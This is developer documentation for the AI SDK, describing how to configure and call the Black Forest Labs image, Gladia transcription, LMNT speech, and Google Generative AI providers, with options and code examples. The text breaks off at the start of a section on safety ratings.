blackForestLabs,
BlackForestLabsImageProviderOptions,
} from '@ai-sdk/black-forest-labs';
import { experimental_generateImage as generateImage } from 'ai';
// Example: Modify existing image
await generateImage({
model: blackForestLabs.image('flux-kontext-pro'),
prompt: 'Put a donut next to the flour.',
providerOptions: {
blackForestLabs: {
inputImage: '<base64 converted image>',
} satisfies BlackForestLabsImageProviderOptions,
},
});
Provider Options
Black Forest Labs image models support flexible provider options through the providerOptions.blackForestLabs object. You can pass any parameters supported by the specific endpoint's API. The supported parameters depend on the used model ID:
- imagePrompt - Base64-encoded image to use as additional visual context for generation
- imagePromptStrength - Strength of the image prompt influence on generation (0.0 to 1.0)
- inputImage - Base64-encoded image or URL of an image to use as reference. Supports up to 20MB or 20 megapixels.
- outputFormat - Desired format of the output image. Can be "jpeg" or "png".
- promptUpsampling - If true, performs upsampling on the prompt
- raw - Enable raw mode for more natural, authentic aesthetics
- safetyTolerance - Moderation level for inputs and outputs. Value ranges from 0 (most strict) to 6 (more permissive).
- webhookSecret - Secret for webhook signature verification, sent in the X-Webhook-Secret header
- webhookUrl - URL for asynchronous completion notification. Must be a valid HTTP/HTTPS URL.
- pollIntervalMillis - Interval in milliseconds between polling attempts (default 500ms)
- pollTimeoutMillis - Overall timeout in milliseconds for polling before timing out (default 60s)
- width - Output width in pixels for models that support explicit dimensions. Range 256-1920, default 1024. When set, this overrides any width derived from size.
- height - Output height in pixels for models that support explicit dimensions. Range 256-1920, default 768. When set, this overrides any height derived from size.
- steps - Number of inference steps. Higher values may improve quality but increase generation time
- guidance - Guidance scale for generation. Higher values follow the prompt more closely
- inputImage2 … inputImage10 - Additional reference images (base64 string or URL) for models that support multiple inputs, used alongside inputImage
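A minimal sketch using the explicit-dimension and output options above (the specific values are illustrative):

```ts
import { blackForestLabs } from '@ai-sdk/black-forest-labs';
import { experimental_generateImage as generateImage } from 'ai';

// Request a wide 1280x768 PNG with a moderate safety tolerance.
const { image } = await generateImage({
  model: blackForestLabs.image('flux-pro-1.1'),
  prompt: 'A lighthouse on a cliff in heavy fog',
  providerOptions: {
    blackForestLabs: {
      width: 1280, // overrides any width derived from size
      height: 768,
      outputFormat: 'png',
      safetyTolerance: 2, // 0 (most strict) to 6 (more permissive)
    },
  },
});
```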
Regional Endpoints
By default, requests are sent to https://api.bfl.ai/v1. You can select a regional endpoint by setting baseURL when creating the provider instance:
import { createBlackForestLabs } from '@ai-sdk/black-forest-labs';
const blackForestLabs = createBlackForestLabs({
baseURL: 'https://api.eu.bfl.ai/v1', // or https://api.us.bfl.ai/v1
});
title: Gladia description: Learn how to use the Gladia provider for the AI SDK.
Gladia Provider
The Gladia provider contains language model support for the Gladia transcription API.
Setup
The Gladia provider is available in the @ai-sdk/gladia module. You can install it with pnpm add @ai-sdk/gladia (or the equivalent npm, yarn, or bun command).
Provider Instance
You can import the default provider instance gladia from @ai-sdk/gladia:
import { gladia } from '@ai-sdk/gladia';
If you need a customized setup, you can import createGladia from @ai-sdk/gladia and create a provider instance with your settings:
import { createGladia } from '@ai-sdk/gladia';
const gladia = createGladia({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the Gladia provider instance:
- apiKey string
  API key that is being sent using the Authorization header. It defaults to the GLADIA_API_KEY environment variable.
- headers Record<string,string>
  Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
  Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Transcription Models
You can create models that call the Gladia transcription API
using the .transcription() factory method.
const model = gladia.transcription();
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the summarize option will enable summaries for sections of content.
import { experimental_transcribe as transcribe } from 'ai';
import { gladia } from '@ai-sdk/gladia';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: gladia.transcription(),
audio: await readFile('audio.mp3'),
providerOptions: { gladia: { summarize: true } },
});
The following provider options are available:
- contextPrompt string
  Context to feed the transcription model with for possible better accuracy. Optional.
- customVocabulary boolean | any[]
  Custom vocabulary to improve transcription accuracy. Optional.
- customVocabularyConfig object
  Configuration for custom vocabulary. Optional.
  - vocabulary Array<string | { value: string, intensity?: number, pronunciations?: string[], language?: string }>
  - defaultIntensity number
- detectLanguage boolean
  Whether to automatically detect the language. Optional.
- enableCodeSwitching boolean
  Enable code switching for multilingual audio. Optional.
- codeSwitchingConfig object
  Configuration for code switching. Optional.
  - languages string[]
- language string
  Specify the language of the audio. Optional.
- callback boolean
  Enable callback when transcription is complete. Optional.
- callbackConfig object
  Configuration for callback. Optional.
  - url string
  - method 'POST' | 'PUT'
- subtitles boolean
  Generate subtitles from the transcription. Optional.
- subtitlesConfig object
  Configuration for subtitles. Optional.
  - formats Array<'srt' | 'vtt'>
  - minimumDuration number
  - maximumDuration number
  - maximumCharactersPerRow number
  - maximumRowsPerCaption number
  - style 'default' | 'compliance'
- diarization boolean
  Enable speaker diarization. Defaults to true. Optional.
- diarizationConfig object
  Configuration for diarization. Optional.
  - numberOfSpeakers number
  - minSpeakers number
  - maxSpeakers number
  - enhanced boolean
- translation boolean
  Enable translation of the transcription. Optional.
- translationConfig object
  Configuration for translation. Optional.
  - targetLanguages string[]
  - model 'base' | 'enhanced'
  - matchOriginalUtterances boolean
- summarization boolean
  Enable summarization of the transcription. Optional.
- summarizationConfig object
  Configuration for summarization. Optional.
  - type 'general' | 'bullet_points' | 'concise'
- moderation boolean
  Enable content moderation. Optional.
- namedEntityRecognition boolean
  Enable named entity recognition. Optional.
- chapterization boolean
  Enable chapterization of the transcription. Optional.
- nameConsistency boolean
  Enable name consistency in the transcription. Optional.
- customSpelling boolean
  Enable custom spelling. Optional.
- customSpellingConfig object
  Configuration for custom spelling. Optional.
  - spellingDictionary Record<string, string[]>
- structuredDataExtraction boolean
  Enable structured data extraction. Optional.
- structuredDataExtractionConfig object
  Configuration for structured data extraction. Optional.
  - classes string[]
- sentimentAnalysis boolean
  Enable sentiment analysis. Optional.
- audioToLlm boolean
  Enable audio to LLM processing. Optional.
- audioToLlmConfig object
  Configuration for audio to LLM. Optional.
  - prompts string[]
- customMetadata Record<string, any>
  Custom metadata to include with the request. Optional.
- sentences boolean
  Enable sentence detection. Optional.
- displayMode boolean
  Enable display mode. Optional.
- punctuationEnhanced boolean
  Enable enhanced punctuation. Optional.
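As a minimal sketch, diarization and translation can be combined (the target languages are illustrative):

```ts
import { experimental_transcribe as transcribe } from 'ai';
import { gladia } from '@ai-sdk/gladia';
import { readFile } from 'fs/promises';

// Diarize the audio and translate the transcript into French and German.
const result = await transcribe({
  model: gladia.transcription(),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    gladia: {
      diarization: true,
      translation: true,
      translationConfig: { targetLanguages: ['fr', 'de'] },
    },
  },
});
```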
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| Default | | | | |
title: LMNT description: Learn how to use the LMNT provider for the AI SDK.
LMNT Provider
The LMNT provider contains speech model support for the LMNT speech API.
Setup
The LMNT provider is available in the @ai-sdk/lmnt module. You can install it with pnpm add @ai-sdk/lmnt (or the equivalent npm, yarn, or bun command).
Provider Instance
You can import the default provider instance lmnt from @ai-sdk/lmnt:
import { lmnt } from '@ai-sdk/lmnt';
If you need a customized setup, you can import createLMNT from @ai-sdk/lmnt and create a provider instance with your settings:
import { createLMNT } from '@ai-sdk/lmnt';
const lmnt = createLMNT({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the LMNT provider instance:
- apiKey string
  API key that is being sent using the Authorization header. It defaults to the LMNT_API_KEY environment variable.
- headers Record<string,string>
  Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
  Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Speech Models
You can create models that call the LMNT speech API
using the .speech() factory method.
The first argument is the model id e.g. aurora.
const model = lmnt.speech('aurora');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying a voice to use for the generated audio.
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { lmnt } from '@ai-sdk/lmnt';
const result = await generateSpeech({
model: lmnt.speech('aurora'),
text: 'Hello, world!',
language: 'en', // Standardized language parameter
});
Provider Options
The LMNT provider accepts the following options:
- model 'aurora' | 'blizzard'
  The LMNT model to use. Defaults to 'aurora'.
- language 'auto' | 'en' | 'es' | 'pt' | 'fr' | 'de' | 'zh' | 'ko' | 'hi' | 'ja' | 'ru' | 'it' | 'tr'
  The language to use for speech synthesis. Defaults to 'auto'.
- format 'aac' | 'mp3' | 'mulaw' | 'raw' | 'wav'
  The audio format to return. Defaults to 'mp3'.
- sampleRate number
  The sample rate of the audio in Hz. Defaults to 24000.
- speed number
  The speed of the speech. Must be between 0.25 and 2. Defaults to 1.
- seed number
  An optional seed for deterministic generation.
- conversational boolean
  Whether to use a conversational style. Defaults to false.
- length number
  Maximum length of the audio in seconds. Maximum value is 300.
- topP number
  Top-p sampling parameter. Must be between 0 and 1. Defaults to 1.
- temperature number
  Temperature parameter for sampling. Must be at least 0. Defaults to 1.
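A minimal sketch passing several of these options via providerOptions.lmnt (the values are illustrative):

```ts
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { lmnt } from '@ai-sdk/lmnt';

// Faster, conversational MP3 output.
const result = await generateSpeech({
  model: lmnt.speech('aurora'),
  text: 'Thanks for calling! How can I help you today?',
  providerOptions: {
    lmnt: {
      format: 'mp3',
      speed: 1.25, // between 0.25 and 2
      conversational: true,
    },
  },
});
```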
Model Capabilities
| Model | Instructions |
|---|---|
| aurora | |
| blizzard | |
title: Google Generative AI description: Learn how to use Google Generative AI Provider.
Google Generative AI Provider
The Google Generative AI provider contains language and embedding model support for the Google Generative AI APIs.
Setup
The Google provider is available in the @ai-sdk/google module. You can install it with pnpm add @ai-sdk/google (or the equivalent npm, yarn, or bun command).
Provider Instance
You can import the default provider instance google from @ai-sdk/google:
import { google } from '@ai-sdk/google';
If you need a customized setup, you can import createGoogleGenerativeAI from @ai-sdk/google and create a provider instance with your settings:
import { createGoogleGenerativeAI } from '@ai-sdk/google';
const google = createGoogleGenerativeAI({
// custom settings
});
You can use the following optional settings to customize the Google Generative AI provider instance:
- baseURL string
  Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://generativelanguage.googleapis.com/v1beta.
- apiKey string
  API key that is being sent using the x-goog-api-key header. It defaults to the GOOGLE_GENERATIVE_AI_API_KEY environment variable.
- headers Record<string,string>
  Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
  Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create models that call the Google Generative AI API using the provider instance.
The first argument is the model id, e.g. gemini-2.5-flash.
The models support tool calls and some have multi-modal capabilities.
const model = google('gemini-2.5-flash');
You can use Google Generative AI language models to generate text with the generateText function:
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text } = await generateText({
model: google('gemini-2.5-flash'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Google Generative AI language models can also be used in the streamText, generateObject, and streamObject functions
(see AI SDK Core).
Google Generative AI also supports some model specific settings that are not part of the standard call settings. You can pass them as an options argument:
const model = google('gemini-2.5-flash');
await generateText({
model,
providerOptions: {
google: {
safetySettings: [
{
category: 'HARM_CATEGORY_UNSPECIFIED',
threshold: 'BLOCK_LOW_AND_ABOVE',
},
],
},
},
});
The following optional provider options are available for Google Generative AI models:
- cachedContent string
  Optional. The name of the cached content used as context to serve the prediction. Format: cachedContents/{cachedContent}
- structuredOutputs boolean
  Optional. Enable structured output. Default is true.
  This is useful when the JSON Schema contains elements that are not supported by the OpenAPI schema version that Google Generative AI uses. You can use this to disable structured outputs if you need to.
  See Troubleshooting: Schema Limitations for more details.
- safetySettings Array<{ category: string; threshold: string }>
  Optional. Safety settings for the model.
  - category string
    The category of the safety setting. Can be one of the following: HARM_CATEGORY_HATE_SPEECH, HARM_CATEGORY_DANGEROUS_CONTENT, HARM_CATEGORY_HARASSMENT, HARM_CATEGORY_SEXUALLY_EXPLICIT
  - threshold string
    The threshold of the safety setting. Can be one of the following: HARM_BLOCK_THRESHOLD_UNSPECIFIED, BLOCK_LOW_AND_ABOVE, BLOCK_MEDIUM_AND_ABOVE, BLOCK_ONLY_HIGH, BLOCK_NONE
- responseModalities string[]
  The modalities to use for the response. The following modalities are supported: TEXT, IMAGE. When not defined or empty, the model defaults to returning only text.
- thinkingConfig { thinkingLevel?: 'low' | 'high'; thinkingBudget?: number; includeThoughts?: boolean }
  Optional. Configuration for the model's thinking process. Only supported by specific Google Generative AI models.
  - thinkingLevel 'low' | 'high'
    Optional. Controls the thinking depth for Gemini 3 models. Use 'low' for faster responses or 'high' for deeper reasoning. Gemini 3.1 Pro supports 'low', 'medium', and 'high'; Gemini 3 Pro supports 'low' and 'high'; Gemini 3 Flash supports all four levels: 'minimal', 'low', 'medium', and 'high'. Only supported by Gemini 3 models.
  - thinkingBudget number
    Optional. Gives the model guidance on the number of thinking tokens it can use when generating a response. Setting it to 0 disables thinking, if the model supports it. For more information about the possible value ranges for each model see the Google Generative AI thinking documentation.
  - includeThoughts boolean
    Optional. If set to true, thought summaries are returned, which are synthesized versions of the model's raw thoughts and offer insights into the model's internal reasoning process.
- imageConfig { aspectRatio: string }
  Optional. Configuration for the model's image generation. Only supported by specific Google Generative AI models.
  - aspectRatio string
    By default the model generates 1:1 squares, or matches the output image size to that of your input image. Can be one of the following: 1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9
  - imageSize string
    Controls the output image resolution. Defaults to 1K. Can be one of the following: 1K, 2K, 4K
- audioTimestamp boolean
  Optional. Enables timestamp understanding for audio-only files. See the Google Cloud audio understanding documentation.
- mediaResolution string
  Optional. If specified, the media resolution specified will be used. Can be one of the following: MEDIA_RESOLUTION_UNSPECIFIED, MEDIA_RESOLUTION_LOW, MEDIA_RESOLUTION_MEDIUM, MEDIA_RESOLUTION_HIGH
- labels Record<string, string>
  Optional. Defines labels used in billing reports. Available on Vertex AI only. See the Google Cloud labels documentation.
- serviceTier 'standard' | 'flex' | 'priority'
  Optional. The service tier to use for the request. Set to 'flex' for 50% cheaper processing at the cost of increased latency. Set to 'priority' for ultra-low latency at a 75-100% price premium over 'standard'.
- threshold string
  Optional. Standalone threshold setting that can be used independently of safetySettings. Uses the same values as the safetySettings threshold.
Thinking
The Gemini 2.5 and Gemini 3 series models use an internal "thinking process" that significantly improves their reasoning and multi-step planning abilities, making them highly effective for complex tasks such as coding, advanced mathematics, and data analysis. For more information see Google Generative AI thinking documentation.
Gemini 3 Models
For Gemini 3 models, use the thinkingLevel parameter to control the depth of reasoning:
import { google, GoogleGenerativeAIProviderOptions } from '@ai-sdk/google';
import { generateText } from 'ai';
const model = google('gemini-3.1-pro-preview');
const { text, reasoning } = await generateText({
model: model,
prompt: 'What is the sum of the first 10 prime numbers?',
providerOptions: {
google: {
thinkingConfig: {
thinkingLevel: 'high',
includeThoughts: true,
},
} satisfies GoogleGenerativeAIProviderOptions,
},
});
console.log(text);
console.log(reasoning); // Reasoning summary
Gemini 2.5 Models
For Gemini 2.5 models, use the thinkingBudget parameter to control the number of thinking tokens:
import { google, GoogleGenerativeAIProviderOptions } from '@ai-sdk/google';
import { generateText } from 'ai';
const model = google('gemini-2.5-flash');
const { text, reasoning } = await generateText({
model: model,
prompt: 'What is the sum of the first 10 prime numbers?',
providerOptions: {
google: {
thinkingConfig: {
thinkingBudget: 8192,
includeThoughts: true,
},
} satisfies GoogleGenerativeAIProviderOptions,
},
});
console.log(text);
console.log(reasoning); // Reasoning summary
File Inputs
The Google Generative AI provider supports file inputs, e.g. PDF files.
import fs from 'node:fs';
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const result = await generateText({
model: google('gemini-2.5-flash'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model according to this document?',
},
{
type: 'file',
data: fs.readFileSync('./data/ai.pdf'),
mediaType: 'application/pdf',
},
],
},
],
});
You can also use YouTube URLs directly:
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const result = await generateText({
model: google('gemini-2.5-flash'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'Summarize this video',
},
{
type: 'file',
data: 'https://www.youtube.com/watch?v=dQw4w9WgXcQ',
mediaType: 'video/mp4',
},
],
},
],
});
See File Parts for details on how to use files in prompts.
Cached Content
Google Generative AI supports both explicit and implicit caching to help reduce costs on repetitive content.
Implicit Caching
Gemini 2.5 models automatically provide cache cost savings without needing to create an explicit cache. When you send requests that share common prefixes with previous requests, you'll receive a 75% token discount on cached content.
To maximize cache hits with implicit caching:
- Keep content at the beginning of requests consistent
- Add variable content (like user questions) at the end of prompts
- Ensure requests meet minimum token requirements:
- Gemini 2.5 Flash: 1024 tokens minimum
- Gemini 2.5 Pro: 2048 tokens minimum
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
// Structure prompts with consistent content at the beginning
const baseContext =
'You are a cooking assistant with expertise in Italian cuisine. Here are 1000 lasagna recipes for reference...';
const { text: veggieLasagna } = await generateText({
model: google('gemini-2.5-pro'),
prompt: `${baseContext}\n\nWrite a vegetarian lasagna recipe for 4 people.`,
});
// Second request with same prefix - eligible for cache hit
const { text: meatLasagna, providerMetadata } = await generateText({
model: google('gemini-2.5-pro'),
prompt: `${baseContext}\n\nWrite a meat lasagna recipe for 12 people.`,
});
// Check cached token count in usage metadata
console.log('Cached tokens:', providerMetadata.google?.usageMetadata);
// e.g.
// {
// groundingMetadata: null,
// safetyRatings: null,
// usageMetadata: {
// cachedContentTokenCount: 2027,
// thoughtsTokenCount: 702,
// promptTokenCount: 2152,
// candidatesTokenCount: 710,
// totalTokenCount: 3564
// }
// }
Explicit Caching
For guaranteed cost savings, you can still use explicit caching with Gemini 2.5 and 2.0 models. See the models page to check if caching is supported for the used model:
import { google } from '@ai-sdk/google';
import { GoogleAICacheManager } from '@google/generative-ai/server';
import { generateText } from 'ai';
const cacheManager = new GoogleAICacheManager(
process.env.GOOGLE_GENERATIVE_AI_API_KEY,
);
const model = 'gemini-2.5-pro';
const { name: cachedContent } = await cacheManager.create({
model,
contents: [
{
role: 'user',
parts: [{ text: '1000 Lasagna Recipes...' }],
},
],
ttlSeconds: 60 * 5,
});
const { text: veggieLasagnaRecipe } = await generateText({
model: google(model),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
providerOptions: {
google: {
cachedContent,
},
},
});
const { text: meatLasagnaRecipe } = await generateText({
model: google(model),
prompt: 'Write a meat lasagna recipe for 12 people.',
providerOptions: {
google: {
cachedContent,
},
},
});
Code Execution
With Code Execution, certain models can generate and execute Python code to perform calculations, solve problems, or provide more accurate information.
You can enable code execution by adding the code_execution tool to your request.
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text, toolCalls, toolResults } = await generateText({
model: google('gemini-2.5-pro'),
tools: { code_execution: google.tools.codeExecution({}) },
prompt: 'Use python to calculate the 20th fibonacci number.',
});
The response will contain the tool calls and results from the code execution.
Google Search
With Google Search grounding, the model has access to the latest information using Google Search.
import { google } from '@ai-sdk/google';
import { GoogleGenerativeAIProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text, sources, providerMetadata } = await generateText({
model: google('gemini-2.5-flash'),
tools: {
google_search: google.tools.googleSearch({}),
},
prompt:
'List the top 5 San Francisco news from the past week.' +
'You must include the date of each article.',
});
// access the grounding metadata. Casting to the provider metadata type
// is optional but provides autocomplete and type safety.
const metadata = providerMetadata?.google as
| GoogleGenerativeAIProviderMetadata
| undefined;
const groundingMetadata = metadata?.groundingMetadata;
const safetyRatings = metadata?.safetyRatings;
The googleSearch tool accepts the following optional configuration options:
- searchTypes object
  Enables specific search types. Both can be combined.
  - webSearch: Enable web search grounding (pass {} to enable). This is the default.
  - imageSearch: Enable image search grounding (pass {} to enable).
- timeRangeFilter object
  Restricts search results to a specific time range. Both startTime and endTime are required.
  - startTime: Start time in ISO 8601 format (e.g. '2025-01-01T00:00:00Z').
  - endTime: End time in ISO 8601 format (e.g. '2025-12-31T23:59:59Z').
google.tools.googleSearch({
searchTypes: { webSearch: {} },
timeRangeFilter: {
startTime: '2025-01-01T00:00:00Z',
endTime: '2025-12-31T23:59:59Z',
},
});
When Google Search grounding is enabled, the model will include sources in the response.
Additionally, the grounding metadata includes detailed information about how search results were used to ground the model's response. Here are the available fields:
- webSearchQueries (string[] | null)
  - Array of search queries used to retrieve information
  - Example: ["What's the weather in Chicago this weekend?"]
- searchEntryPoint ({ renderedContent: string } | null)
  - Contains the main search result content used as an entry point
  - The renderedContent field contains the formatted content
- groundingSupports (Array of support objects | null)
  - Contains details about how specific response parts are supported by search results
  - Each support object includes:
    - segment: Information about the grounded text segment
      - text: The actual text segment
      - startIndex: Starting position in the response
      - endIndex: Ending position in the response
    - groundingChunkIndices: References to supporting search result chunks
    - confidenceScores: Confidence scores (0-1) for each supporting chunk
Example response:
{
"groundingMetadata": {
"webSearchQueries": ["What's the weather in Chicago this weekend?"],
"searchEntryPoint": {
"renderedContent": "..."
},
"groundingSupports": [
{
"segment": {
"startIndex": 0,
"endIndex": 65,
"text": "Chicago weather changes rapidly, so layers let you adjust easily."
},
"groundingChunkIndices": [0],
"confidenceScores": [0.99]
}
]
}
}
File Search
The File Search tool lets Gemini retrieve context from your own documents that you have indexed in File Search stores. Only Gemini 2.5 models support this feature.
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text, sources } = await generateText({
model: google('gemini-2.5-pro'),
tools: {
file_search: google.tools.fileSearch({
fileSearchStoreNames: [
'projects/my-project/locations/us/fileSearchStores/my-store',
],
metadataFilter: 'author = "Robert Graves"',
topK: 8,
}),
},
prompt: "Summarise the key themes of 'I, Claudius'.",
});
File Search responses include citations via the normal sources field and expose raw grounding metadata in providerMetadata.google.groundingMetadata.
URL Context
Google provides a provider-defined URL context tool.
The URL context tool allows you to provide specific URLs that you want the model to analyze directly from the prompt.
import { google } from '@ai-sdk/google';
import { GoogleGenerativeAIProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text, sources, providerMetadata } = await generateText({
model: google('gemini-2.5-flash'),
prompt: `Based on the document: https://ai.google.dev/gemini-api/docs/url-context.
Answer this question: How many links can we consume in one request?`,
tools: {
url_context: google.tools.urlContext({}),
},
});
const metadata = providerMetadata?.google as
| GoogleGenerativeAIProviderMetadata
| undefined;
const groundingMetadata = metadata?.groundingMetadata;
const urlContextMetadata = metadata?.urlContextMetadata;
The URL context metadata includes detailed information about how the model used the URL context to generate the response. Here are the available fields:
- `urlMetadata` (`{ retrievedUrl: string; urlRetrievalStatus: string }[] | null`): Array of URL context metadata. Each object includes:
  - `retrievedUrl`: The URL of the context.
  - `urlRetrievalStatus`: The status of the URL retrieval.
Example response:
{
"urlMetadata": [
{
"retrievedUrl": "https://ai-sdk.dev/providers/ai-sdk-providers/google-generative-ai",
"urlRetrievalStatus": "URL_RETRIEVAL_STATUS_SUCCESS"
}
]
}
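Building on the urlContextMetadata value extracted above, a small sketch (field names as in the example response) that flags URLs the model could not retrieve:
const failedUrls = urlContextMetadata?.urlMetadata?.filter(
  entry => entry.urlRetrievalStatus !== 'URL_RETRIEVAL_STATUS_SUCCESS',
);
if (failedUrls?.length) {
  console.warn('Some URLs could not be retrieved:', failedUrls);
}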
With the URL context tool, you will also get the groundingMetadata.
"groundingMetadata": {
"groundingChunks": [
{
"web": {
"uri": "https://ai-sdk.dev/providers/ai-sdk-providers/google-generative-ai",
"title": "Google Generative AI - AI SDK Providers"
}
}
],
"groundingSupports": [
{
"segment": {
"startIndex": 67,
"endIndex": 157,
"text": "**Installation**: Install the `@ai-sdk/google` module using your preferred package manager"
},
"groundingChunkIndices": [
0
]
}
]
}
You can add up to 20 URLs per request.
Combine URL Context with Search Grounding
You can combine the URL context tool with search grounding to provide the model with the latest information from the web.
import { google } from '@ai-sdk/google';
import { GoogleGenerativeAIProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text, sources, providerMetadata } = await generateText({
model: google('gemini-2.5-flash'),
prompt: `Based on this context: https://ai-sdk.dev/providers/ai-sdk-providers/google-generative-ai, tell me how to use Gemini with AI SDK.
Also, provide the latest news about AI SDK V5.`,
tools: {
google_search: google.tools.googleSearch({}),
url_context: google.tools.urlContext({}),
},
});
const metadata = providerMetadata?.google as
| GoogleGenerativeAIProviderMetadata
| undefined;
const groundingMetadata = metadata?.groundingMetadata;
const urlContextMetadata = metadata?.urlContextMetadata;
Google Maps Grounding
With Google Maps grounding, the model has access to Google Maps data for location-aware responses. This enables providing local data and geospatial context, such as finding nearby restaurants.
import { google } from '@ai-sdk/google';
import { GoogleGenerativeAIProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text, sources, providerMetadata } = await generateText({
model: google('gemini-2.5-flash'),
tools: {
google_maps: google.tools.googleMaps({}),
},
providerOptions: {
google: {
retrievalConfig: {
latLng: { latitude: 34.090199, longitude: -117.881081 },
},
},
},
prompt:
'What are the best Italian restaurants within a 15-minute walk from here?',
});
const metadata = providerMetadata?.google as
| GoogleGenerativeAIProviderMetadata
| undefined;
const groundingMetadata = metadata?.groundingMetadata;
The optional retrievalConfig.latLng provider option provides location context for queries about nearby places. This configuration applies to any grounding tools that support location context, including Google Maps and Google Search.
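For example, here is a sketch of the same retrievalConfig applied to Google Search grounding to bias results toward the user's location:
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text } = await generateText({
  model: google('gemini-2.5-flash'),
  tools: { google_search: google.tools.googleSearch({}) },
  providerOptions: {
    google: {
      retrievalConfig: {
        latLng: { latitude: 34.090199, longitude: -117.881081 },
      },
    },
  },
  prompt: 'What outdoor events are happening nearby this weekend?',
});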
When Google Maps grounding is enabled, the model's response will include sources pointing to Google Maps URLs. The grounding metadata includes maps chunks with place information:
{
"groundingMetadata": {
"groundingChunks": [
{
"maps": {
"uri": "https://maps.google.com/?cid=12345",
"title": "Restaurant Name",
"placeId": "places/ChIJ..."
}
}
]
}
}
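A short sketch for collecting the cited places from the grounding metadata; note the maps field may not be covered by the published provider metadata type, hence the local cast:
for (const chunk of groundingMetadata?.groundingChunks ?? []) {
  // Shape follows the example response above.
  const place = (chunk as { maps?: { title?: string; uri?: string } }).maps;
  if (place) {
    console.log(`${place.title}: ${place.uri}`);
  }
}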
Google Maps grounding is supported on Gemini 2.0 and newer models.
RAG Engine Grounding
With RAG Engine Grounding, the model has access to your custom knowledge base using the Vertex RAG Engine. This enables the model to provide answers based on your specific data sources and documents.
import { createVertex } from '@ai-sdk/google-vertex';
import { GoogleGenerativeAIProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';
const vertex = createVertex({
project: 'my-project',
location: 'us-central1',
});
const { text, sources, providerMetadata } = await generateText({
model: vertex('gemini-2.5-flash'),
tools: {
vertex_rag_store: vertex.tools.vertexRagStore({
ragCorpus:
'projects/my-project/locations/us-central1/ragCorpora/my-rag-corpus',
topK: 5,
}),
},
prompt:
'What are the key features of our product according to our documentation?',
});
// access the grounding metadata. Casting to the provider metadata type
// is optional but provides autocomplete and type safety.
const metadata = providerMetadata?.google as
| GoogleGenerativeAIProviderMetadata
| undefined;
const groundingMetadata = metadata?.groundingMetadata;
const safetyRatings = metadata?.safetyRatings;
When RAG Engine Grounding is enabled, the model will include sources from your RAG corpus in the response.
Additionally, the grounding metadata includes detailed information about how RAG results were used to ground the model's response. Here are the available fields:
- `groundingChunks` (array of chunk objects | null): Contains the retrieved context chunks from your RAG corpus. Each chunk includes:
  - `retrievedContext`: Information about the retrieved context.
    - `uri`: The URI or identifier of the source document.
    - `title`: The title of the source document (optional).
    - `text`: The actual text content of the chunk.
- `groundingSupports` (array of support objects | null): Contains details about how specific response parts are supported by RAG results. Each support object includes:
  - `segment`: Information about the grounded text segment.
    - `text`: The actual text segment.
    - `startIndex`: Starting position in the response.
    - `endIndex`: Ending position in the response.
  - `groundingChunkIndices`: References to supporting RAG result chunks.
  - `confidenceScores`: Confidence scores (0-1) for each supporting chunk.
Example response:
{
"groundingMetadata": {
"groundingChunks": [
{
"retrievedContext": {
"uri": "gs://my-bucket/docs/product-guide.pdf",
"title": "Product User Guide",
"text": "Our product includes advanced AI capabilities, real-time processing, and enterprise-grade security features."
}
}
],
"groundingSupports": [
{
"segment": {
"startIndex": 0,
"endIndex": 45,
"text": "Our product includes advanced AI capabilities and real-time processing."
},
"groundingChunkIndices": [0],
"confidenceScores": [0.95]
}
]
}
}
Configuration Options
The vertexRagStore tool accepts the following configuration options:
- `ragCorpus` (string, required): The RagCorpus resource name in the format `projects/{project}/locations/{location}/ragCorpora/{rag_corpus}`. This identifies your specific RAG corpus to search against.
- `topK` (number, optional): The number of top contexts to retrieve from your RAG corpus. Defaults to the corpus configuration if not specified.
Image Outputs
Gemini models with image generation capabilities (e.g. gemini-2.5-flash-image-preview) can generate images alongside text. Generated images are exposed as files in the response.
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const result = await generateText({
model: google('gemini-2.5-flash-image-preview'),
prompt:
'Create a picture of a nano banana dish in a fancy restaurant with a Gemini theme',
});
for (const file of result.files) {
if (file.mediaType.startsWith('image/')) {
console.log('Generated image:', file);
}
}
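Generated files expose their data as base64 and uint8Array, so persisting the images in Node.js is a short step (the file name is illustrative):
import fs from 'node:fs';
let imageIndex = 0;
for (const file of result.files) {
  if (file.mediaType.startsWith('image/')) {
    // Write the raw bytes of each generated image to disk.
    fs.writeFileSync(`image-${imageIndex++}.png`, file.uint8Array);
  }
}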
Safety Ratings
